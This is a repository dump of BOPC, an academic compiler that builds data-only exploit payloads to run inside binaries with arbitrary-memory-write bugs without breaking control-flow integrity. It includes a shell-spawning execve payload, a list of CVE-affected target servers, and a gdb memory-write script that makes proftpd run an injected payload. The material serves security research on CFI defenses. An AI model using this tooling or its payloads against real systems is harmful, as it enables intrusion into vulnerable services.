Repository: HexHive/BOPC
Branch: master
Commit: dc98173b4baf
Files: 44
Total size: 590.8 KB

Directory structure:
gitextract_g5a28eqg/

├── README.md
├── evaluation/
│   ├── README.md
│   ├── ghttpd
│   ├── httpd
│   ├── lt-wireshark
│   ├── nginx1
│   ├── nullhttpd
│   ├── opensshd
│   ├── orzhttpd
│   ├── proftpd
│   ├── smbclient
│   ├── sudo
│   └── wuftpd
├── payloads/
│   ├── README.md
│   ├── abloop.spl
│   ├── execve.spl
│   ├── ifelse.spl
│   ├── infloop.spl
│   ├── loop.spl
│   ├── memrd.spl
│   ├── memwr.spl
│   ├── print.spl
│   ├── regmod.spl
│   ├── regref4.spl
│   ├── regref5.spl
│   ├── regset4.spl
│   └── regset5.spl
├── setup.sh
└── source/
    ├── BOPC.py
    ├── README.md
    ├── absblk.py
    ├── calls.py
    ├── capability.py
    ├── compile.py
    ├── config.py
    ├── coreutils.py
    ├── delta.py
    ├── map.py
    ├── mark.py
    ├── optimize.py
    ├── output.py
    ├── path.py
    ├── search.py
    └── simulate.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================


# Block Oriented Programming Compiler (BOPC)

___


## What is BOPC

**NEW:** The talk from CCS'18 presentation is available
[here](https://www.youtube.com/watch?v=iK7jhrK5uyg).


BOPC (stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary,
Turing-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that
execute the desired payload while adhering to the binary's Control Flow Graph (CFG).
This implies that the existing control flow hijacking defenses are not sufficient to
detect this style of execution, as execution does never violates the Control Flow
Integrity (CFI).

Essentially, we can say that Block Oriented Programming is _code reuse under CFI_. 

BOPC works with basic blocks (hence the name "block-oriented"). What it does is to find
a set of _functional_ blocks (i.e., blocks that perform useful computations). This step
is somewhat similar with finding Return Oriented Programming (ROP) gadgets.
Having the functional blocks, BOPC looks for _dispatcher_ blocks to that are used to
stitch functional blocks together. Compared to ROP (that we can move from one gadget
to the next without any limitation), here we can't do that as it would violate the CFI.
Instead, BOPC finds a proper sequence for dispatcher blocks that naturally lead the
execution from one functional block to the next one.
Unfortunately the problem of building _Data-Only_ payloads is NP-hard. 
However it turns out that in practice BOPC finds solution in a reasonable amount
of time.


For more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf),
and our [slides](./ccs18_slides.pdf) from CCS'18.


To operate, BOPC requires 3 inputs:
* A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**)
* The desired payload, expressed in a high level language called SPL (stands for _SPloit Language_)
* The so-called "_entry point_", which is the first instruction in the binary that the
payload execution should start. There can be more than one entry points and determining it is
part of the vulnerability discovery process.


The output of BOPC is a set of "what-where" memory writes that indicate how the memory 
should be initialized (i.e., what values to write at which memory addresses). 
When the execution reaches the entry point and the memory is initialized according to
the output of BOPC, the target binary execute the desired payload instead of continuing
the original execution.


**Disclaimer:** This is a research project coded by a single guy. It's not a product,
so do **not** expect it to work perfectly under all scenarios. It works nicely for the
 provided test cases, but beyond that we cannot guarantee that will work as expected.

___


## Installation
Just run `setup.sh` :)

___


## How to use BOPC

BOPC started as a hacky project, so several changes made to adapt it into an scientific
context. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly
different from the actual implementation, as we omitted several implementation details
from the paper. The actual implementation overview is shown below:
![alt text](./source/images/BOPC_overview.png)


### Command line arguments explained

A good place to start are the command line arguments:

```
usage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d]
               [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY]
               [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all]
               [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings]
               [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]]

optional arguments:
  -h, --help            show this help message and exit

General Arguments:
  -b BINARY, --binary BINARY
                        Binary file of the target application
  -a {save,load,saveonly}, --abstractions {save,load,saveonly}
                        Work with abstraction file
  --emit-IR             Dump SPL IR to a file and exit
  -d                    Set debugging level to minimum
  -dd                   Set debugging level to basic (recommended)
  -ddd                  Set debugging level to verbose (DEBUG ONLY)
  -dddd                 Set debugging level to print-everything (DEBUG ONLY)
  -V, --version         show program's version number and exit

Search Options:
  -s SOURCE, --source SOURCE
                        Source file with SPL payload
  -e ENTRY, --entry ENTRY
                        The entry point in the binary that payload starts
  -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full}
                        Use the SPL optimizer (Default: none)
  -f {raw,idc,gdb}, --format {raw,idc,gdb}
                        The format of the solution (Default: raw)
  --find-all            Find all the solutions

Application Capability:
  -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...]
                        Measure application's capability. Options (can be many)
                        
                        all	Search for all Statements
                        regset	Search for Register Assignments
                        regmod	Search for Register Modifications
                        memrd	Search for Memory Reads
                        memwr	Search for Memory Writes
                        call	Search for Function/System Calls
                        cond	Search for Conditional Jumps
                        load	Load capabilities from file
                        save	Save capabilities to file
                        noedge	Dump statements and exit (don't calculate edges)

Debugging Options:
  --mapping-id ID       Run the Trace Searching algorithm on a given mapping ID
  --mapping MAP [MAP ...]
                        Run the Trace Searching algorithm on a given register mapping
  --enum-mappings       Enumerate all possible mappings and exit
  --abstract-blk BLKADDR
                        Abstract a specific basic block and exit
```

Ok, there are a lot of options here (divided into 4 categories) as BOPC can do several things.

Let's start with the **General Arguments**. To avoid working directly with assembly, BOPC,
"abstracts" each basic block into a set of "actions". For more details, please check
[absblk.py](./source/absblk.py). Abstraction process symbolically executes each basic block
in the binary and carefully monitors its actions. The abstraction process can take from a few
minutes (for small binaries) to several hours (for the larger ones). Waiting that much every
time that you want to run BOPC does not sound a good idea, so BOPC uses an old trick: _caching_.

The abstraction process depends on the binary and not on the SPL payload nor the entry point,
so we only need to calculate them *once* per binary. Therefore, we have to calculate the
abstractions only one time, then save them into a file and each time loading them. 
The `save` and `saveonly` options save the abstractions into a file. The only difference is that
`saveonly` halts execution after it saves the abstractions, while `save` continues to search
for a solution. As you can guess, the `load` option loads the abstractions from a file.

The `--emit-IR` option is used to "dump" the IR representation of the SPL payload (this is
another intermediate result that you should not worry about it).

BOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend you
to use either the `-dd` or the `-ddd` to get a detailed progress status.

Let's get into the **Search Options** options. The most important arguments here are the
`--source` (which is a file that contains the SPL payload) and the `--entry` which is an
address inside the binary that indicates the entry point. Trace searching starts from the
entry point, so this is quite important.


The optimizer (`-O` option) is double edge knife. On the one hand, it optimizes the SPL
payload to make it more flexible. This means that it increases the likelihood to find a
solution. On the other hand, the search space (along with the execution time) is increased.
The decision is up to the user, hence the use of optimizer is optional. The 2 possible
optimizations are the _out of order execution_ (`ooo` option) and the _statement rewriting_
(`rewrite` option). 


The out-of-order optimization reorders payload statements.
Consider for example the following SPL payload:
```
	__r0 = 13;
	__r1 = 37;
```

To find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`)
then a functional block for the second statement (`__r1 = 37`) and a set of dispatcher blocks
to connect these two statements. However these functional blocks may be far apart so a dispatcher
may not exist. However there's no difference if you execute the `__r0 = 13` statement first
or second as it does not have any dependencies with the other statement. Thus if we rewrite
the payload as follows:
```
	__r1 = 37;
	__r0 = 13;
```

It may be possible to find another set dispatcher blocks, hopefully much smaller 
(path `A -> B` may be much longer than path `B -> A`) and find a solution.

Internally, this is a **two-step** process. First the optimizer **groups** independent
statements together (for more details take a look [here](./source/optimize.py)) and
generated and augmented SPL IR. Then, the trace search module, permutes statements
within each group, each time resulting in a different SPL payload. However all these
payloads are equivalent. As you can guess there are can be an exponential number of 
permutations, so this can take forever. To alleviate that, you can adjust
`N_OUT_OF_ORDER_ATTEMPTS` configuration parameter and tell BOPC to stop after trying 
**N** iterations, instead of trying all of them.


The statement rewriting is an under development optimization that rewrites
some statements that do not exist in the binary. For instance if the SPL payload
spawns a shell through 'execve()' but the target binary does not invoke
`execve()` at all, then BOPC fails as there are no functional blocks for that statement.
However, if the target binary invokes `execv()`, it may be possible to find a solution
by replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements,
and adjust payload accordingly.


As we already explained, the output of BOPC is a set of "what-where" memory writes. There
are several ways to express the output. For instance they can be raw lines containing the
address, the value and the size of the data that should be written in memory. Or they can
be a gdb/IDA script that can run directly on the debugger and modify the memory accordingly.
The last option is the best one as it you only need to run the BOPC output into the debugger.
Currently only the `gdb` format is implemented.


The **Application Capability** options used to measure _Application's capabilities_, that
gives us upper bounds on **what** payloads the target binary is capable of executing.


Finally the **Debugging Options** assist the audit/debugging/development process. They are used
to bypass parts of the BOP work-flow. Do not use them unless you're doing changes in the code.
Recall that BOPC finds a mapping between virtual and host registers along with a mapping
between SPL variables and underlying memory addresses. If that mapping does not lead to
a solution it goes back and tries another one. If you want to focus on a specific mapping
(e.g., let's say that code crashes at mapping 458), you don't have to wait for BOPC to try
the first 457 mappings first. By supplying the `--mapping-id=458` option you can skip
all mappings and focus on that one. In case that you don't know the mapping number but you
know the actual mapping you can instead you the `--mapping` option: `--mapping=`__r0=rax __r1=rbx`


Finally, BOPC has a lot of configuration options. You see all of them in 
[config.py](./source/config.py) and adjust them according to our needs. The default
values are a nice trade off between accuracy and performance that I found during
then evaluation.


## Example

Let's see now how to actually use BOPC. The first thing to do is to get the basic block
abstractions. This step is optional, but I expect that you are going to run BOPC several times,
so it's a good idea to get the abstractions first:
```
./source/BOPC.py -dd --binary $BINARY --abstractions saveonly
```

This calculates the abstractions and saves them into a  file named `$BINARY.abs`. Don't forget
to enable debugging to see the status on the screen.


Writing an SPL payload is pretty much like writing C:
```C
void payload() 
{ 
    string prog = "/bin/sh\0";
    int argv    = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;
    
    execve(__r0, __r1, __r2);
}
```


Please take a look at the available [payloads](./payloads) to see all features of SPL.
Don't expect to write crazy program with SPL; Yes, in theory you can write any program.
In practice the more complicated is the SPL payload, the more the complexity increases
and the harder it gets to find a solution.


Running BOPC is as simple as the following:
```
./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \
--entry $ENTRY --format gdb
```

If everything goes well an `*.gdb` file will be created that contains the set of memory writes
to execute the desired payload.


### Pruning search space

A common problem is that there can be thousands of mappings (it's exponential based on the 
number of registers and variables that are used). Each mapping can take up to a minute to test
(assuming out of order execution and other optimizations), so BOPC may run for days.

However, if you know approximately where a solution could be, you can ask BOPC to quickly find
(and verify) it, without trying all mappings. Let's assume that you want to execute the following
SPL payload:
```C
void payload() 
{ 
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 32;

    write( __r0, __r1, __r2 );
}
```

Because we have a system call, we know the register mapping: 
`__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`.

Let's assume that we're on `proftpd` binary which contains the following "all-in-one"
functional block:
```Assembly
.text:000000000041D0B5 loc_41D0B5:
.text:000000000041D0B5        mov     edi, cs:scoreboard_fd ; fd
.text:000000000041D0BB        mov     edx, 20h        ; n
.text:000000000041D0C0        mov     esi, offset header ; buf
.text:000000000041D0C5        call    _write
```

The abstractions for this basic block, will be the following (recall that to get the
abstractions for a single basic block, you need to pass the `--abstract-blk 0x41D0B5`
in the command line).
```
[22:02:07,822] [+] Abstractions for basic block 0x41d0b5:
[22:02:07,823] [+]          regwr :
[22:02:07,823] [+] 		rsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'}
[22:02:07,823] [+] 		rdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': <BV64 0x66e9e0>, 'deps': []}
[22:02:07,823] [+] 		rsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'}
[22:02:07,823] [+] 		rdx = {'writable': False, 'const': 32L, 'type': 'concrete'}
[22:02:07,823] [+]          memrd : set([(<SAO <BV64 0x66e9e0>>, 32)])
[22:02:07,823] [+]          memwr : set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 0x41d0ca>>)])
[22:02:07,823] [+]          conwr : set([(576460752303359992L, 64)])
[22:02:07,823] [+]       splmemwr : []
[22:02:07,823] [+]           call : {}
[22:02:07,823] [+]           cond : {}
[22:02:07,823] [+]        symvars : {}
[22:02:07,823] [*] 
```

Here, `__r0 <-> rdi` is loaded indirectly and the value of `__r1 <-> rsi` (which holds the `msg` 
variable) is `6787008` or `0x678fc0` in hex. Then we enumerate all possible mappings with the
`--enum-mappings` option. Here, there are *287* possible mappinges, but there are instances that
we have thousands of mappings:


If we look at the output we can quickly search for the appropriate mapping, which in our case
is mapping *#89*:
```
[.... TRUNCATED FOR BREVITY ....]
[21:59:28,471] [*] Trying mapping #88:
[21:59:28,471] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,471] [*] 	Variables: msg <-> *<BV64 0x7ffffffffff1440>
[21:59:28,614] [*] Trying mapping #89:
[21:59:28,614] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,614] [*] 	Variables: msg <-> 0x678fc0L
[21:59:28,762] [*] Trying mapping #90:
[21:59:28,762] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,762] [*] 	Variables: msg <-> *<BV64 r12_56287_64 + 0x28>
[.... TRUNCATED FOR BREVITY ....]
[22:00:04,709] [*] Trying mapping #287:
[22:00:04,709] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[22:00:04,709] [*] 	Variables: msg <-> *<BV64 __add__(((0#32 .. rbx_294059_64[31:0]) << 0x5), r12_294068_64, 0x10)>
[22:00:04,979] [+] Trace searching algorithm finished with exit code 0
```

Now that we know the actual mapping, we can tell BOPC to focus on this one. All we have to
do is to pass the `--mapping-id 89` option.


We run this and after 1 minute and 51 seconds later, we get the solution:
```
#
# This file has been created by BOPC at: 29/03/2018 22:04
# 
# Solution #1
# Mapping #89
# Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
# Variables: msg <-> 0x678fc0L
# 
# Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')]
# 

break *0x403740
break *0x41d0b5

# Entry point
set $pc = 0x41d0b5 

# Allocation size is always bigger (it may not needed at all)
set $pool = malloc(20480)

# In case that rbp is not initialized
set $rbp = $rsp + 0x800 

# Stack and frame pointers aliases
set $stack = $rsp 
set $frame = $rbp 

set {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00}

set {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
```

Let's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed.
This is a list of `($pc, $src, $dst)` tuples. `$pc` is the program counter of the SPL statement.
`$src` is the address of the functional block for the current SPL statement and `$dst` is the
address of the next functional block.


Before it runs, script adjusts `$rip` to point to the entry point, and makes sure that
stack pointers (`$rsp`, `$rbp`) are valid. It also allocates a "variable pool" (for
more details please look at [simulate.py](./source/simulate.py)) which in our case is not
used.

Then we have the two actual memory writes at `0x678fc0` and at `0x66e9e0`. If you load
the binary in gdb and run this script you will see your payload being executed:

```
(gdb) break main
Breakpoint 5 at 0x4041a0
(gdb) run
Starting program: /home/ispo/BOPC/evaluation/proftpd 

Breakpoint 1, 0x00000000004041a0 in main ()
(gdb) continue
Continuing.

Breakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard ()
(gdb) continue
Continuing.

Breakpoint 2, 0x0000000000403740 in write@plt ()
(gdb) continue
Continuing.
This is my random message! :)
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffde60 in ?? ()
```

Note that BOPC stops after executing the desired payload (hence the crash). If you
want to avoid this situation you can use the `returnto` SPL statement to naturally
transfer execution to a safe location.


### Measuring application capabilities

**NOTE:** This is a new concept, which is not mentioned in the paper. 

Beyond finding Data-Only payloads, BOPC provides some basic capability measurements.
Although it is not related to the Block Oriented Programming, it can provide upper
bounds and strong "indications" on what types of payloads can be executed and what
are not. This is very useful as we can quickly find types of payloads that **cannot**
be executed in the target binary.  
To get the all application capabilities run the following code:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save
```

If you want to simply dump all functional gadgets for a specific statement, you can do
it as follows:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge
```

Where `$STMT` can be one ore more from `{all, regset, regmod, memrd, memwr, call, cond}`.
The `noedge` option is to boost things up (essentially it does not calculate edges in the
capability graph; Each node in the capability graph represents a functional block from
the binary while and edge represents the context-sensitive shortest path distance
between two functional blocks).


___


## Final Notes (please read them carefully!)

* When the symbolic execution engine deals with filesystem (i.e., it has to `open` a file),
we have to provide it a valid file. Filename is defined in `SYMBOLIC_FILENAME` in 
[coreutils.py](./source/coreutils.py).

* If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add
CLI flags to trigger it :P

* In case that addresses used by concolic execution do not work, adjust them from 
[simulate.py](./source/simulate.py)

* Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py)

* For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet)

___


================================================
FILE: evaluation/README.md
================================================


# Block Oriented Programming Compiler (BOPC)
___


### Vulnerable Application Overview


| Application                | CVE           |
|----------------------------|---------------|
|[ProFTPd](./proftpd)        | CVE-2006-5815 |
|[nginx](./nginx1)           | CVE-2013-2028 |
|[sudo](./sudo)              | CVE-2012-0809 |
|[orzhttpd](./orzhttpd)      | BugtraqID 41956 |
|[wuftdp](./wuftpd)          | CVE-2000-0573 |
|[nullhttpd](./nullhttpd)    | CVE-2002-1496 |
|[opensshd](./opensshd)      | CVE-2001-0144 |
|[wireshark](./lt-wireshark) | CVE-2014-2299 |
|[apache](./httpd)           | CVE-2006-3747 |
|[smbclient](./smbclient)    | CVE-2009-1886 |

___


================================================
FILE: payloads/README.md
================================================


# Block Oriented Programming Compiler (BOPC)
___


### SPL Payload Overview


| Payload                  | Description                                 |
|--------------------------|---------------------------------------------|
| [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values |
| [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory |
| [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values |
| [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory |
| [regmod](./regmod.spl)   | Initialize a register with an arbitrary value and modify it |
| [memrd](./memrd.spl)     | Read from arbitrary memory |
| [memwr](./memwr.spl)     | Write to arbitrary memory |
| [print](./print.spl)     | Display a message to stdout using write |
| [execve](./execve.spl)   | Spawn a shell through execve |
| [abloop](./abloop.spl)   | Perform an arbitrarily long bounded loop utilizing regmod |
| [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body |
| [ifelse](./ifelse.spl)   | An if-else condition based on a register comparison |
| [loop](./loop.spl)       | Conditional loop with register modification |


___


================================================
FILE: payloads/abloop.spl
================================================
// 
// BOPC Evaluation
//
// Arbitrary bounded loop with register modification
//
void payload() 
{ 
    __r0 = 0;

LOOP:

    __r0 += 1;

    goto LOOP;
}


================================================
FILE: payloads/execve.spl
================================================
// 
// BOPC Evaluation
//
// execve('/bin/sh') payload
//
void payload() 
{ 
    string prog = "/bin/sh\0";
    int argv    = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;
    
    execve(__r0, __r1, __r2);

    // return ?
}


================================================
FILE: payloads/ifelse.spl
================================================
// 
// BOPC Evaluation
//
// Simple if-else condition
//
void payload() 
{ 
    __r0 = 0;

    if (__r0 != 0 ) goto SKIP;

    __r1 = 1;

    goto END;

SKIP:
    __r1 = 0;


END:
    // return 0x400ca7;
    __r0 = 0;

}


================================================
FILE: payloads/infloop.spl
================================================
// 
// BOPC Evaluation
//
// Infinity loop with constant assignment
//
void payload() 
{ 

//  __r0 = 1;

LOOP:
    __r1 = 0;

    goto LOOP;
}


================================================
FILE: payloads/loop.spl
================================================
// 
// BOPC Evaluation
//
// Simple loop
//
void payload() 
{ 
    __r0 = 0;

LOOP:
    __r0 += 1;

    if (__r0 != 3 ) goto LOOP;
}


================================================
FILE: payloads/memrd.spl
================================================
// 
// BOPC Evaluation
//
// Memory Load
//
void payload() 
{ 
    int array = {1, 2, 3, 4, 5};
    
    __r1 = &array;

    __r0 = *__r1;

}


================================================
FILE: payloads/memwr.spl
================================================
// 
// BOPC Evaluation
//
// Memory Store
//
void payload() 
{ 
    int array = {1, 2, 3, 4, 5};
    
    __r0 = &array;
    __r1 = 0;

    *__r0 = __r1;

}


================================================
FILE: payloads/print.spl
================================================
// 
// BOPC Evaluation
//
// Print an arbitrary message to stdout using write()
//
void payload() 
{ 
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 1;


    write( __r0, __r1, __r2 );

    // return 0x?? ;s
}


================================================
FILE: payloads/regmod.spl
================================================
// 
// BOPC Evaluation
//
// Register modification
//
void payload() 
{ 
    __r0 = 0;

    __r0 += 1;
}


================================================
FILE: payloads/regref4.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 4 registers with references
//
void payload() 
{ 
    int    var_a = 0x100;
    string var_b = "this is a random string";
    int    var_c = {1, 2, 3, &var_a, 4, &var_b};
    int    var_d = &var_c;

    __r0 = &var_a;
    __r1 = &var_b;
    __r2 = &var_c;
    __r3 = &var_d;
}


================================================
FILE: payloads/regref5.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 5 registers with references
//
void payload() 
{ 
	long   var_a = 0x100;
	string var_b = "this is a random string\x00";

	long    *var_c = {1, 2, 3, 4, &var_a, &var_b};
	long    var_d = &var_c;
	long    *var_e = {&var_d, &var_d, &var_d};

	__r0 = &var_a;
	__r1 = &var_b;
	__r2 = &var_c;
	__r3 = &var_d;
	__r4 = &var_e;

	// return ??
}


================================================
FILE: payloads/regset4.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 4 registers
//
void payload() 
{ 
    __r0 = 0;
    __r1 = 1;
    __r2 = 2;
    __r3 = 3;
}


================================================
FILE: payloads/regset5.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 5 registers
//
void payload() 
{ 
    __r0 = 0;
    __r1 = 1;
    __r2 = 2;
    __r3 = 3;
    __r4 = 4;
}


================================================
FILE: setup.sh
================================================
#!/bin/bash
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
msg() {
    GREEN='\033[01;32m'                         # bold green
    NC='\033[0m'                                # no color
    echo -e "${GREEN}[INFO]${NC} $1"
}

error() {
    RED='\033[01;31m'                           # bold red
    NC='\033[0m'                                # no color
    echo -e "${RED}[ERROR]${NC} $1"
}


# display fancy foo
clear
echo
echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
echo -e '\t%                                                                    %'
echo -e '\t%                :::::::::   ::::::::  :::::::::   ::::::::          %'
echo -e '\t%               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %'
echo -e '\t%              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %'
echo -e '\t%             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %'
echo -e '\t%            +#+    +#+ +#+    +#+ +#+        +#+                    %'
echo -e '\t%           #+#    #+# #+#    #+# #+#        #+#    #+#              %'
echo -e '\t%          #########   ########  ###         ########                %'
echo -e '\t%                                                                    %'
echo -e '\t%                Block Oriented Programming Compiler                 %'
echo -e '\t%                                                                    %'
echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
echo 
msg "BOPC Installation Guide has been started ..."


# base check (we need root)
if [ "$EUID" -ne 0 ]; then
    error "Script needs root permissions to install the required packages."
    msg "Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)"
    echo

    exit
fi

# install prerequisites first
apt-get install --yes python-pip
apt-get install --yes graphviz libgraphviz-dev
apt-get install --yes pkg-config python-tk 


# install pip packages
pip install angr==7.8.9.26
pip install claripy==7.8.9.26
pip install matplotlib
pip install simuvex
# networkx must be installed after simuvex and angr, since they depend
# on networkx 2.1
pip install networkx==1.11
pip install graphviz==0.8.1
pip install pygraphviz==1.3.1


msg "BOPC Installation completed ..."
msg "Have a nice day :)"
echo

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/BOPC.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
# BOPC.py:
#
#
# This is the main module of BOPC. It configures the environment and launches the other modules.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import absblk     as A
import compile    as C
import optimize   as O
import mark       as M
import search     as S
import capability as P

import argparse
import textwrap
import ntpath
import angr
import os
import sys


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
VERSION  = 'v2.1'                                   # current version
comments = ''                                       # Additional comments to display on startup


# -------------------------------------------------------------------------------------------------
# parse_args(): This function processes the command line arguments.
#
# :Ret: None.
#
def parse_args():
    # create the parser object and the groups
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)

    group_g = parser.add_argument_group('General Arguments')
    group_s = parser.add_argument_group('Search Options')
    group_c = parser.add_argument_group('Application Capability')
    group_d = parser.add_argument_group('Debugging Options')


    # -------------------------------------------------------------------------
    # Group for general arguments
    # -------------------------------------------------------------------------
    group_g.add_argument(
        '-b', "--binary",
        help     = "Binary file of the target application",
        action   = 'store',
        dest     = 'binary',
        required = False, # True
    )

    group_g.add_argument(
        '-a', "--abstractions",
        help     = "Work with abstraction file",
        choices  = ['save', 'load', 'saveonly'],
        default  = 'none',
        action   = 'store',
        dest     = 'abstractions',
        required = False
    )

    group_g.add_argument(
        "--emit-IR",
        help     = "Dump SPL IR to a file and exit",
        action   = 'store_const',
        const    = True,
        dest     = 'emit_IR',
        required = False
    )

    # action='count'
    group_g.add_argument(
        '-d',
        help     = "Set debugging level to minimum",
        action   = 'store_const',
        const    = DBG_LVL_1,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-dd',
        help     = "Set debugging level to basic (recommended)",
        action   = 'store_const',
        const    = DBG_LVL_2,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-ddd',
        help     = "Set debugging level to verbose (DEBUG ONLY)",
        action   = 'store_const',
        const    = DBG_LVL_3,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-dddd',
        help     = "Set debugging level to print-everything (DEBUG ONLY)",
        action   = 'store_const',
        const    = DBG_LVL_4,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-V', "--version",
        action   = 'version',
        version  = 'BOPC %s' % VERSION
    )


    # -------------------------------------------------------------------------
    # Group for searching arguments
    # -------------------------------------------------------------------------
    group_s.add_argument(
        '-s', "--source",
        help     = "Source file with SPL payload",
        action   = 'store',
        dest     = 'source',
        required = False
    )

    group_s.add_argument(
        '-e', "--entry",
        help     = "The entry point in the binary that payload starts",
        action   = 'store',
        dest     = 'entry',
        required = False
    )

    group_s.add_argument(
        '-O', "--optimizer",
        help     = "Use the SPL optimizer (Default: none)",
        choices  = ['none', 'ooo', 'rewrite', 'full'],
        action   = 'store',
        default  = 'none',
        dest     = 'optimizer',
        required = False
    )

    group_s.add_argument(
        '-f', "--format",
        help     = "The format of the solution (Default: raw)",
        choices  = ['raw', 'idc', 'gdb'],
        action   = 'store',
        default  = 'raw',
        dest     = 'format',
